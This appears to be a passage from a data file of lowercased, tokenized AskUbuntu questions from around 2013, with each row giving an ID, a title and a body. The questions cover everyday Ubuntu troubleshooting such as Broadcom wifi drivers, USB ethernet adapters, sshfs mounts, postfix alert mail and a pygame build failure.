broadcom-sta-dkms results in a program problem detected error atempting to install using bcmwl-kernel-source_6.20.155.1+bdcom-0ubuntu0.0.1_amd64.deb with or without the ubuntu software center results in a program problem detected error similar to the first , and triggers an `` ubuntu has experienced an internal error '' crash . any time i attempt to modprobe a wl driver terminal hangs . other modprobes seem to go through ( resulting in a plain yurt @ latria : ~s line ) . i have sudo rebooted after each of these attempts , to no success . here are some of my logs in an attempt to get to the root of this issue . iwconfig yurt @ latria : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . rfkill list all 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1c.4 pci bridge : intel corporation panther point pci express root port 5 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 11a1 ( rev a1 ) 01:00.1 audio device : nvidia corporation device 0e0a ( rev a1 ) 03:00.0 network controller : broadcom corporation device 43b1 ( rev 03 ) 04:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) lspci -vvnn | grep 14e4 yurt @ latria : ~ $ lspci -vvnn | grep 14e4 03:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:43b1 ] ( rev 03 ) program problem make error upon trying sudo apt-get install broadcom-sta-dkms dkms make.log for broadcom-sta-5.100.82.112 for kernel 3.5.0-34-generic ( x86_64 ) wed jun 26 07:41:36 edt 2013 make : entering directory `/usr/src/linux-headers-3.5.0-34-generic' wireless extension is the only possible api for this kernel version using wireless extension api kernel architecture is x86_64 ld /var/lib/dkms/broadcom-sta/5.100.82.112/build/built-in.o cc [ m ] /var/lib/dkms/broadcom-sta/5.100.82.112/build/src/shared/linux_osl.o cc [ m ] /var/lib/dkms/broadcom-sta/5.100.82.112/build/src/wl/sys/wl_linux.o /var/lib/dkms/broadcom-sta/5.100.82.112/build/src/wl/sys/wl_linux.c:43:24 : fatal error : asm/system.h : no such file or directory compilation terminated . make [ 1 ] : *** [ /var/lib/dkms/broadcom-sta/5.100.82.112/build/src/wl/sys/wl_linux.o ] error 1 make : *** [ _module_/var/lib/dkms/broadcom-sta/5.100.82.112/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.5.0-34-generic' uname -a linux latria 3.5.0-34-generic # 55~precise1-ubuntu smp fri jun 7 16:25:50 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo lshw -c network *-network description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:17 memory : f5400000-f5407fff memory : f5200000-f53fffff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c0 serial : 08:60:6e:10 : af:7e size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full ip=192.168.1.5 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : f5600000-f563ffff ioport : d000 ( size=128 ) i have plenty of screenshots and links to methods i have tried to use to get this to work but i do not have enough reputation to post them i guess so i can send those upon request i suppose . i am connected to ethernet currently , but would enjoy having wireless enabled . i have removed bcmwl-kernel-source and am ready to start again clean , so any instructions or help would be appreciated . thank you .
312847	how to install ( or troubleshoot ) a usb 3.0 ax88179 gigabit ethernet adapter ?	i have a usb 3.0 ax88179 based gigabit ethernet adapter and after searching online , i found many people reporting success with this device under linux . the driver entered the mainline kernel on version 3.9 , but even before that , downloading the drivers from the the asix websites , compiling and loading the driver manually should work fine . unfortunately this is not the case for me on ubuntu 12.10 and 13.04 on a dell xps 13 developer edition . i compile the driver ( v1.4.0 ) without any problems ( make , make install ) , i load it using modprobe and i see it as eth2 . i can even see some rx/tx traffic but it can not acquire an ip address so it is unusable . dmesg output : [ 1338.583575 ] asix usb ethernet adapter : v1.4.0 10:01:27 jun 26 2013 [ 1338.583575 ] http : //www.asix.com.tw [ 1338.583599 ] ax88179_178a 4-2:1.0 ( unregistered net_device ) : mtu 1500 [ 1338.584080 ] ax88179_178a 4-2:1.0 eth0 : register 'ax88179_178a ' at usb-0000:00:14.0-2 , asix ax88179 usb 3.0 gigibit ethernet , 00:24:9b:06:6a:85 [ 1338.585110 ] usbcore : registered new interface driver ax88179_178a [ 1338.932157 ] ipv6 : addrconf ( netdev_up ) : eth2 : link is not ready [ 1338.933382 ] ipv6 : addrconf ( netdev_up ) : eth2 : link is not ready [ 1341.887977 ] ax88179_178a 4-2:1.0 eth2 : ax88179_178a - link status is : 1 [ 1341.889595 ] ax88179_178a 4-2:1.0 eth2 : write medium type : 0x013f [ 1341.890699 ] ipv6 : addrconf ( netdev_change ) : eth2 : link becomes ready [ 1341.891748 ] ax88179_178a 4-2:1.0 eth2 : link up , 1000mbps , full-duplex , lpa 0xc1e1 ifconfig output : eth2 link encap : ethernet hwaddr 00:24:9b:06:6a:85 inet6 addr : fe80 : :224:9bff : fe06:6a85/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:76623 errors:1 dropped:22802 overruns:0 frame:1 tx packets:302 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2601276 ( 2.6 mb ) tx bytes:109741 ( 109.7 kb ) a different usb 2.0 gigabit ethernet adapter and the wifi are both working fine , so networking should n't be a problem on my laptop . is there something i miss for this specific chipset ? follow up with the latest kubuntu ( and i guess ubuntu as well ) is working ! so the problem is fixed . i guess it was a driver/kernel/hardware issue which is not present anymore with the latest kernel . i can not tell the exact kernel version which made it to work , but for trusty 14.04 everything looks fine !
312852	13.04 server error changing net interface name eth0 to p33p1 : device or resource busy	13.04 server installed to iscsi target and on boot i get 2-3 minute wait while udevd attempts to change the name of the only network adapter name from eth0 to p33p1 presumably failing because this is bound and in use by the root boot device . syslog output : jun 24 13:20:00 htpc mtp-probe : checking bus 2 , device 2 : '' /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-2 '' jun 24 13:20:00 htpc mtp-probe : bus : 2 , device : 2 was not an mtp device jun 24 13:20:00 htpc mtp-probe : checking bus 4 , device 2 : '' /sys/devices/pci0000:00/0000:00:1d.2/usb4/4-2 '' jun 24 13:20:00 htpc mtp-probe : bus : 4 , device : 2 was not an mtp device jun 24 13:20:00 htpc kernel : [ 9.947429 ] wmi : mapper loaded **jun 24 13:20:00 htpc udevd [ 470 ] : error changing net interface name eth0 to p33p1 : device or resource busy** jun 24 13:20:00 htpc kernel : [ 10.080452 ] type=1400 audit ( 1372076400.540:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=575 comm= '' apparmor_parser '' workaround was to edit /etc/network/interfaces and rename p33p1 to eth0 /var/log/installer shows : jun 24 11:24:30 net/hw-detect.hotplug : detected hotpluggable network interface p33p1 jun 24 11:24:31 check-missing-firmware : /dev/.udev/firmware-missing does not exist , skipping jun 24 11:24:31 check-missing-firmware : /run/udev/firmware-missing does not exist , skipping jun 24 11:24:31 check-missing-firmware : no missing firmware in /dev/.udev/firmware-missing /run/udev/firmware-missing jun 24 11:24:32 kernel : [ 72.293318 ] r8169 0000:04:00.0 p33p1 : link down jun 24 11:24:32 kernel : [ 72.293383 ] ipv6 : addrconf ( netdev_up ) : p33p1 : link is not ready the link eventually acquires an address however later the server hangs for ~2 mins with this message : waiting up to 60 more seconds for network configuration it subsequently completes booting with the only network interface from the output of ifconfig showing as eth0 . this appears to be a similar issue as that reported in 12.04 ed
312853	unable to install osspd	i try to install osspd , but i get the message that i need the library lib6c > = 2.17 i tried to install it by : apt-get install osspd http : //sourceforge.net/projects/osspd/ http : //www.ubuntuupdates.org/package/core/raring/universe/base/osspd apt-cache policy osspd n : unable to locate package osspd version : cat /proc/version linux version 3.5.0-34-generic ( buildd @ roseapple ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 55~precise1-ubuntu smp fri jun 7 16:25:50 utc 2013 all with the same result . not easy to backport to 12.10 lts ? ? ! ! ! ! ! ! ! nevermind since what i wanted was to have the sound back working , i follow the thread : no sound civ 5 and wine i installed ia32-libs-multiarc , so that did the trick
312857	lxpanel volume control tells me to install alsamixer	i am using lubuntu 13.04 and out of the blue , the volume control icon that sits in the panel stopped opening alsamixer , when i right-click on it and chose `` volume control settings '' - it used to open alsamixer . i can still change volume and mute/unmute when i left-click on the icon . i can run alsamixer just fine from a terminal . can you help me ? it 's not serious , but annoying ; ) thanks
312860	alert ! /dev/disk/by-uuid does not exist after power cut during upgrade	during a software update ( ubuntu 13.04 ) , the power was shutdown . now it wont boot straight away , get this error : alert ! /dev/disk/by-uuid/ does not exist . dropping to shell ! the only way it boots up is if i go to advanced option for ubuntu ubuntu , with linux 3.8.0-19-generic ( recovery mode ) then on the recovery menu , select : resume ( thats it , boots like normal ) please help
312864	dconf editor message entry missing	i tried to rearrange my messaging menu in ubuntu 12.04 following this answer http : //askubuntu.com/a/269231/170356 . but in my dconf-editor is no such entry `` âśmessages '' . the command dconf list /com/canonical/indicator/ only returns : appmenu/ datetime/ power/ and sound/ thanks for any idea how to get this entry back , or an other way to rearrange the messaging-menu !
312867	how to add metadata to images using shotwell	using ubuntu 13.04 . i have a very basic question about shotwell . i would like to add a desciption to my photos . i right-click on an image in nautilus . choose open with > shotwell photo viewer . i ca n't find a way to edit any metadata for the photo . as an example , shotwell help : http : //yorba.org/shotwell/help/view-view.html ... says that i should be able to select photos > edit title , but i do n't have this option in my menu . ( i have 'photo ' but not 'photos ' ) . f2 does nothing for me . my menu options are : file , edit , view , photo , help . i 'm missing something very basic here . grateful for your help !
312874	how to turn off the ubuntu 13.04 window fade effect	when i minimize an application it is very slow , due to my slow laptop it 's quite frustrating to see it very slowly creep out of view ! so how can i it turned off ?
312884	delay on ssh authentication	i 've just installed 12.04.2 server amd64 in vmware player and noticed that there is a 3-5 seconds delay after i put the password and before the shell appears . the same happens when i try to connect using some sftp software . in the logs it looks like : jun 26 22:40:01 ubuntu-1204-2-server-amd64 sshd [ 1525 ] : accepted publickey for zerkms from 192.168.19.1 port 56018 ssh2 jun 26 22:40:01 ubuntu-1204-2-server-amd64 sshd [ 1525 ] : pam_unix ( sshd : session ) : session opened for user zerkms by ( uid=0 ) jun 26 22:40:04 ubuntu-1204-2-server-amd64 sshd [ 1662 ] : subsystem request for sftp by user zerkms jun 26 22:40:04 ubuntu-1204-2-server-amd64 sshd [ 1525 ] : pam_unix ( sshd : session ) : session closed for user zerkms i 've already added usedns no to /etc/ssh/sshd_config ( and i did n't forget to restart ssh after that . i even reboot the whole server ; - ) anything else i missed ? any ideas ?
312886	why after ticking automatically connect to vpn the ethernet is not activated automatically anymore ?	i have configured an openvpn session attached to my ethernet wired connection and as soon as i have ticked the option `` automatically connect to vpn when using this connection '' on my wired connection 1 , the ethernet is not activated automatically anymore by the login script and i have to do it manually . it works fine manually but i 'd like to have it done automatically after startup . any suggestions ?
312891	momentary freezes about every 60 seconds	i have just switched from opensuse to ubuntu ( the only reason is poor repositories - i got tired of installing everything from tar-balls ) . opensuse kde worked flawlessly . off-topic os 7 does too . however , ubuntu 13.04 after all updates keeps freezing about every minute . the time differs between occasions . it halts just for a fraction of a second , too quick to notice , but music crackles , and compressed video looses its tracks and covers with errors until a scenecut . i do n't know what is responsible , the logs are clear . tried to : change audio card , switched to nvidia drivers and back , paused all unneeded daemons . did n't help much . any ideas where to look ? i am experienced in linux , just new in ubuntu .
312894	does ubuntu support samsung 350v5c-s05fr series 3 ?	does ubuntu support the samsung series 3 350v5c-s05fr ( core i5 3210m ) laptop ? i saw that ubuntu supports the 350v5c-s06fr laptop range .
312908	jdk x64 fails to unpack in ubuntu 13.04	new to ubuntu , i have just installed the os in my vmplayer . i am trying to install oracle ( sun ) java 6 onto my ubuntu 13 . as per the instruction given here i download jdk-6u45-linux-x64.bin from the official site . followed further instructions of chmod as give in the link . but the unpacking step fails with the following error : unpacking ... checksumming ... extracting ... ./install.sfx.29727 : 1 : ./install.sfx.29727 : elf : not found ./install.sfx.29727 : 2 : ./install.sfx.29727 : syntax error : `` ) '' unexpected failed to extract the files . please refer to the troubleshooting section of the installation instructions on the download page for more information . and a failed encoding file is created in the pwd . @ @ @ � @ 8 @ @ @ @ @ @ ���� @ � @ @ @ ������ @ � @ ( invalid encoding ) i am not able to understand the error messages or the issue at hand . please advice . how can i install java onto my system
312909	can a function be added to ubuntu ? ask users `` do you want to delete it ? yes/no ''	can a function be added to ubuntu ? ask users `` do you want to delete `` xxx '' file ? yes/no '' . sometimes , i incautiously push the delete button to delete some files i need . maybe this setting is ubuntu 's philosophy . anyway , i am still a newbie .
312914	keyboard cursor invisible during rename in ubuntu 12.04	when i rename a directory , the background color is white , text color is black , but the blinking keyboard cursor color is also white or it is invisible ! ! so i am not able to position the cursor for renaming . i am using a custom theme `` ambience dark '' ( 11.04 's default ) . how can i change the cursor color so that it is in contrast with the rename background ?
312915	can not access drive mounted by sshfs using ubuntu file manager	i 've run into a problem with sshfs that i have n't seen before . i mount serverb to servera by doing the following ( while logged in as root on servera ) : mkdir serverblink sshfs root @ serverb : / /home/myname/documents/serverblink once i do that , from the commandline i 'm able to see all the files on serverb via the serverblink folder . business as usual . however , i can not access the serverblink folder using file manager on ubuntu . i do n't know why . i thought it might be a permissions thing because i 'm technically signed into the computer as `` dot '' but in the commandline , i 've switched to root ... ? ? as a test i tried running chmod 777 on the serverblink folder to grant everyone access to everything inside but it still does n't work . using file manager , when i try to access the serverblink folder , i get the error message : could not enter folder any suggestions ?
312916	removing the black bar at the top of the screen [ new found ! ]	[ new found ! ] 1 . when i set to others instead of 1440x900 ( 16:10 ) or 1280x800 ( 16:10 ) revolutions , the black bar must disappear . 2 . when i set to 1440x900 revolution , the black bar must exist . the display area is not fit to my monitor ( 1440x900 ) and there is a black bar at the top of my screen . the bottom of the display area ca n't be displayed . how can i deal with this problem ? i wonder if the problem come from the lack of display card ( msi r4770 cyclone ) driver but i do n't know how to install it . do i need to install it ? ubuntu version : 13.10 here are some related pictures : my monitor ( top ) ( it is a 19 '' desktop monitor . [ acer al1916w ] ) . my monitor ( bottom ) displays xrandr there is no a file named as xorg.conf in x11 . *-display description : vga compatible controller product : rv740 pro [ radeon hd 4770 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:43 memory : d0000000-dfffffff memory : feaf0000-feafffff ioport : d000 ( size=256 ) memory : feac0000-feadffff warning : output may be incomplete or inaccurate , you should run this program as super-user . computer information anyone can help me solve this problem ? thank you for your attention = ]
312919	how to change user gid and uid in ubuntu 13.04 ?	i need some help changing user gid and uid in ubuntu 13.04 in order to map an nfs mount , it is my understanding that these need to be the same on local machine as well as ldap side . thank you .
312920	how to create an ubuntu desktop kickstart cdrom on 12.04 ?	i want to create a kickstart image through cdrom on ubuntu 12.04 , but i am not having success .
312921	dell inspiron 1545 wireless not detecting certain networks	i 'm running ubuntu 13.04 having just reinstalled to see if it fixed the problem , i have installed the wireless drivers and they appear to be functioning as i am picking up the wifi in the hotel down the road ! it is not however , detecting the wireless router nor the booster in our house ( and i 'm next to the booster connected via cable just to type this out ! ) i 'm running out of ideas , i 've updated the headers and it wo n't reinstall the driver . i just ca n't fathom why it wont pick up those networks as the other 4 computers in the house can - main difference being they are all running windows 7/8
312924	when i point my cursor to skype it will not show me the information	i am using ubuntu 12.04 and multiple skype accounts at the same time . when i point my cursor to skype , i want it to show me the information about the logged in account . is there any way to do that ?
312927	booting 13.04 64-bit pendrive in uefi freezes immediately after loading ramdisk on dell inspiron 14z ( bios e10 )	i can get the pendrive to boot in legacy ( aka bios ) mode , but i ca n't get it to boot in uefi mode . when i attempt to boot in uefi/secure mode , it complains before grub even starts . if i boot uefi/insecure mode grub starts , but the machine freezes immediately after attempting to boot the os . by editing grub 's boot entry to include echos in stategic places , i have been able to establish that grub does indeed manage to load both the kernel and the ramdisk into memory , and then the machine freezes . the freeze happens regardless of whether i use nomodeset or not . i even tried noapic and nolapic and acpi=off ( blind shots , i know ) , to no avail . i found quite a few similar questions around here , but no answers that would help me further . i was able to install ubuntu to the disk from the pendrive in legacy mode , but for some reason i ca n't boot the disk installation : grub starts , but it does n't even get to the menu and drops me to the rescue prompt .
312928	issue with grabbing screen ( screenshots )	here is a vid demonstrating the issue . whenever i try and grab a screenshot , i grab a different picture to what i think i am grabbing ( except when using ubuntu 's printscreen functionality when you hit the key ) . this issue is not specifically tied to shutter ( from the video ) , but my own screenshot program written in python demonstrates the same behaviour . a sample of the code that takes the screenshot is here : def grab_screenshot ( ) : `` '' '' grabs a screenshot of the active window and saves it as a png with the current time `` '' '' root = gtk.gdk.screen_get_default ( ) if root.supports_net_wm_hint ( `` _net_active_window '' ) and root.supports_net_wm_hint ( `` _net_wm_window_type '' ) : print `` grabbing active window '' active = root.get_active_window ( ) # comment these two lines if you dont want to enable screenshotting of the entire desktop # instead of just the active window . # if active.property_get ( `` _net_wm_window_type '' ) [ -1 ] [ 0 ] == '_net_wm_window_type_desktop ' : # return `` fail '' # calculate the size of the wm decorations relativex , relativey , winw , winh , d = active.get_geometry ( ) w = winw + ( relativex*2 ) h = winh + ( relativey+relativex ) # calculate the position of where the wm decorations start ( not the window itself ) screenposx , screenposy = active.get_root_origin ( ) print `` screen posx : % d '' % screenposx print `` screen posy : % d '' % screenposy # take the screenshot screenshot = gtk.gdk.pixbuf.get_from_drawable ( gtk.gdk.pixbuf ( gtk.gdk.colorspace_rgb , true , 8 , w , h ) , gtk.gdk.get_default_root_window ( ) , gtk.gdk.colormap_get_system ( ) , screenposx , screenposy , 0 , 0 , w , h ) else : window = gtk.gdk.get_default_root_window ( ) size = window.get_size ( ) print `` the size of the window is % d x % d '' % size pixel_buffer = gtk.gdk.pixbuf ( gtk.gdk.colorspace_rgb , false , 8 , size [ 0 ] , size [ 1 ] ) screenshot = pixel_buffer.get_from_drawable ( window , window.get_colormap ( ) , 0 , 0 , 0 , 0 , size [ 0 ] , size [ 1 ] ) if ( screenshot ! = none ) : timenow = time.time ( ) filename = `` screenshot_ % d.png '' % timenow screenshot.save ( filename , `` png '' ) print `` screenshot saved to `` + filename else : print `` unable to get the screenshot . '' filename = `` fail '' return filename i am guessing this is an issue with the gtk ? i tried ticking the gtk loader utility in compiz , but that does n't seem to have helped in any way .
312936	installing ubuntu , stuck on partitioning	i am trying to install ubuntu 13.04 on my computer and i 'm stuck on partitioning . i get the message : '' some of the partitions you created are to small . please make the following partitions at least this large : /2.9gb if you do not go back to the partitioner and increase the size of these partitions the installation may fail . '' i am a beginner at this . can somebody show me step by step ?
312937	how do you clean install a program ?	i fear i may have deleted all of the loops in ardour and would like to do a clean install . how do you do this ?
312940	global menu bar integration add-on missing in firefox 22 for ubuntu 12.04	i just installed firefox 22 via ppa , and during installation i noticed the global menu bar integration add-on version 22 also was included , but when i launch firefox i can not locate the add-on to disable it . in version 21 it was there , and i did disable it because i do not like to have the menus in the menu bar , but rather have the firefox button next to the tabs . i did search for an answer , but did n't find anything most likely because version 22 just came out . i removed the add-on via terminal 's purge command , and it completed successfully , but after reboot the menu 's are still in the menu bar . i also completely removed firefox via synaptic , installed the software center version , and was able to disable the add-on as before , so i re-downloaded 22 , but again it 's not found . i then looked for the add-on to see if it was installed , and it was , but it 's not visible within the add-on themselves . i noticed on the global menu bar integration ppa page it states as of version 22 is no longer supported , so i 'm confused . how do either remove this add-on to get the firefox button back by the tabs , or make it so i can disable it in the add-on 's page within firefox ?
312943	how to format a partition with ext3 on windows xp for dual-boot ubuntu-windows xp ?	the ubuntu dial boot tutorial says : a grub boot partition 100 mb -- formatted to filesystem type ext3 a logical partition for the / ( root ) folder of each planned linux ( or mac ) os ( at least 10 gb each , but 20-50 gb is better ) -- formatted as ext3 ( or ext4 if you are planning to use a newer linux os ) but how to format ext3 type ? windows xp does n't offer this type . only fat32 .
312949	is being able to install programs without having to use code a part of ubuntu 's future ?	i tried ubuntu a few months ago and loved it . the only real problem i had was that it felt unnecessarily `` hard '' or `` difficult '' , to code in terminal every time i needed something installed . is the kind of installing solution found in windows coming to ubuntu in the future , or do we have to code our way to insanity ?
312951	how to disable automated system alert mails in my box ?	system generates automatically system alert emails to root or username1 bla bla . how can i completely disable such email alerts without stopping mta ( postfix etc ) . edit : step 1 : $ cat /etc/postfix/main.cf smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no append_dot_mydomain = no readme_directory = no smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # using pcname else it generates email to valid email address myhostname = pcnamae_______________________pcname alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydestination = sun- , localhost.localdomain , , localhost relayhost = 1x.x.x.x mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all step 2 : this is where to say auto mails where to send $ cat /etc/aliases root : nul step 3 : aliases file when change requires to load them using the command $ newaliases $ service postfix restart step 4 : test $ echo `` pdf '' | mutt -a `` /var/tmp/data.zip '' -s `` pdf '' -c a @ b.com -e 'my_hdr from : c @ d.com ' -- e @ f.com
312955	move unity launcher to bottom of the screen	i have ubuntu 13.04 desktop version and for some odd reason i 'm told that the unity launcher can not be moved to the bottom of the screen because of several reasons : 1 . canonical wants it there so it fits with their overall design goals , namely when it comes to touchscreen devices and netbooks . this in my mind totally ignores the fact that most ubuntu users are desktop users . no matter what canonicals long term goal is , it surely must n't be at the expense of needs of their core user base . 2 . most monitors are widescreen , the launcher is more compact where it is . this is not only taking away the users choice , but is also a wrong assessment . widescreen monitors can sometimes be rotated on a pivot , giving it a portrait aspect . by displaying the unity launcher on the left side it takes up a lot of space . many desktop users have multiple monitors , and having the launcher on the left side of each monitor is very awkward . also , many websites are catered to fit on a half 1920 display , so you can have two browser windows open side-by-side with all content visible . the placement of the unity launcher takes away the horizontal space meaning there 's less room for each browser window , and you 'll see the right side of the web pages being occluded . any suggestion to simply hide the unity launcher , or `` canonical knows best '' or `` get used to it '' are unwelcome and totally ignores the above points . linux is about choice . canonical 's stubbornness with the unity launcher placement is inconsistent with what linux is about .
312963	ubuntu 13.04 dual monitor with displayport	i am trying to use my apple cinemadisplay with my alienware m17x-r4 i have ubuntu installed and the card has an nvidia 680m card . when i plug in the cinema display , the display properties shows a second monitor as `` apple 24 '' however when i move the toggle to `` on '' nothing happens . further , if i leave that monitor plugged in , and `` on '' the computer reboots in low graphics mode , 640x480 resolution and i have to reinstall ubuntu desktop to get back into normal mode ( all on the alienware 's screen ) any tips on how to make this work ? i had this working before but seem to be missing a step this time . thanks
312965	how can i disable the global menu in firefox ?	i ca n't open bookmarks in new tabs from it ( this seems to be a bug in unity ) , so i disabled the add-on for it . but the latest update for firefox ( 22.0 ) removed that add-on and re-enabled the global menu . how can i disable it again ?
312966	unable to boot ubuntu from usb	i have used universal usb installer and linuxlive usb creater to make a bootable pendrive , but whenever i boot from it just a black screen appears with a dot blinking on upper left corner and it does not proceed from there . please help me as my home pc is not usable now because i formatted hard disk to install ubuntu . thanks
312968	problem with opengl or unity , need gnome fallback mode	this question is in two parts , and i have been searching the web for days to find answers . with no luck i thought i 'd drop by and ask for your help . here goes : 1 . ) i 'm running ubuntu 13.04 and one day last week unity suddenly wound't work . after the login screen , i was either faced with an all black and non-responsive screen , or sometimes it booted and i could see my desktop wallpaper ( and add and remove icons/folders from the desktop ) . but there was no menu in the left hand side and no top bar : - ( however i could still enter the terminal . i borrowed my dad 's laptop and looked for a solution online . about two days later i gave up ( i 'm still kind of a n00b at linux ) and found a way to install gnome fallback , via the terminal . when i used it , i had the same problem . [ clue # 1 ] missing menues . but if i rebooted into gnome fallback mode with no effects . it worked . great ! i have used that for some days now , while still trying to fix the original problem with either unity or opengl or whatever went wrong in the first place . with no luck . after giving up on my search for a fix ( i know that came out wrong ) -- i decided to reinstall ubuntu 13.04 from a cd . but ! after that i was left where i began . when booting into my account , it only shows the desktop wallpaper and the icons . i can click and enter the folders , but not go into the menues . last time i fixed it with gnome fallback mode , because i could enter the terminal and the pc was automatically online , via wireless network . but not this time , i ca n't get online . so : 1 . ) how do i via the livecd ubuntu version ( the one i 'm using right now ) install gnome fallback unto the harddrive based system ? 2 . ) if impossible . how can i access the wireless internet via the terminal , so i can install gnome fallback , from the `` broken '' unity session . 3 . ) is there any other things that i should try ? please help me , ps : my gfx-card is an ati radeon something and i have install and used the `` redwood '' drive ( i think its called ) for many weeks prior to the shutdown .
312970	how can i install programs downloaded form internet ?	i ca n't run programmes that i have just downloaded from the net , like google chrome , because i open them with achieve manager , but it does n't work . why ?
312973	install pygame on 12.04	after following the instructions how do i install pygame in virtualenv ? , running `pip install pygame ' now returns : downloading/unpacking pygame running setup.py egg_info for package pygame skipping module _numericsurfarray for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module _numericsndarray for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module scrap for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module _camera for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . warning : no files found matching 'readme.txt' no previously-included directories found matching '*/cvs' no previously-included directories found matching '*/*/cvs' installing collected packages : pygame running setup.py install for pygame skipping module _numericsurfarray for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module _numericsndarray for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module scrap for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module _camera for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . building 'pygame.imageext ' extension gcc -pthread -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -g -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security -fpic -d_reentrant -i/usr/x11r6/include -i/usr/include/sdl -i/usr/include/sdl -i/usr/include -i/usr/include -i/usr/include/python3.2mu -c src/imageext.c -o build/temp.linux-x86_64-3.2/src/imageext.o in file included from src/imageext.c:47:0 : src/pygame.h:75:20 : fatal error : python.h : no such file or directory compilation terminated . error : command 'gcc ' failed with exit status 1 complete output from command /home/david/.virtualenvs/pywork3/bin/python3.2 -c `` import setuptools ; __file__='/home/david/.virtualenvs/pywork3/build/pygame/setup.py ' ; exec ( compile ( open ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- single-version-externally-managed -- record /tmp/pip-0tu3l3-record/install-record.txt -- install-headers /home/david/.virtualenvs/pywork3/include/site/python3.2 : skipping module _numericsurfarray for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module _numericsndarray for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module scrap for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . skipping module _camera for python 3.2.3 ( default , apr 10 2013 , 06:11:55 ) [ gcc 4.6.3 ] build . running install running build running build_py running build_ext building 'pygame.imageext ' extension gcc -pthread -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -g -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security -fpic -d_reentrant -i/usr/x11r6/include -i/usr/include/sdl -i/usr/include/sdl -i/usr/include -i/usr/include -i/usr/include/python3.2mu -c src/imageext.c -o build/temp.linux-x86_64-3.2/src/imageext.o in file included from src/imageext.c:47:0 : src/pygame.h:75:20 : fatal error : python.h : no such file or directory compilation terminated . error : command 'gcc ' failed with exit status 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command /home/david/.virtualenvs/pywork3/bin/python3.2 -c `` import setuptools ; __file__='/home/david/.virtualenvs/pywork3/build/pygame/setup.py ' ; exec ( compile ( open ( __file__ ) .read ( ) .replace ( '\r\n 